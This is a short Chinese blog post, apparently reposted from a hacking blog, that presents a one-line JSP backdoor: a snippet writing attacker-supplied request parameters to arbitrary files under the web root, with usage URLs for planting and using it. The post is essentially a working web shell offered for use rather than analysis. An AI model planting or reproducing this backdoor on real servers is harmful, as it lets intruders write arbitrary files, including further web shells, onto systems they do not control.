信息来源:s0n9'5 B1o9
java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!
后来没有办法~~ 算了~~ 这样实现吧!
程序代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
这个 后门估计不用我说了吧! 还是提示一下咯!保存为1.jsp 提交url
http://localhost/1.jsp?f=1...&t=hello
然后
http://localhost/1.txt 就出来了 内容为 hello .....
减小字体
增大字体
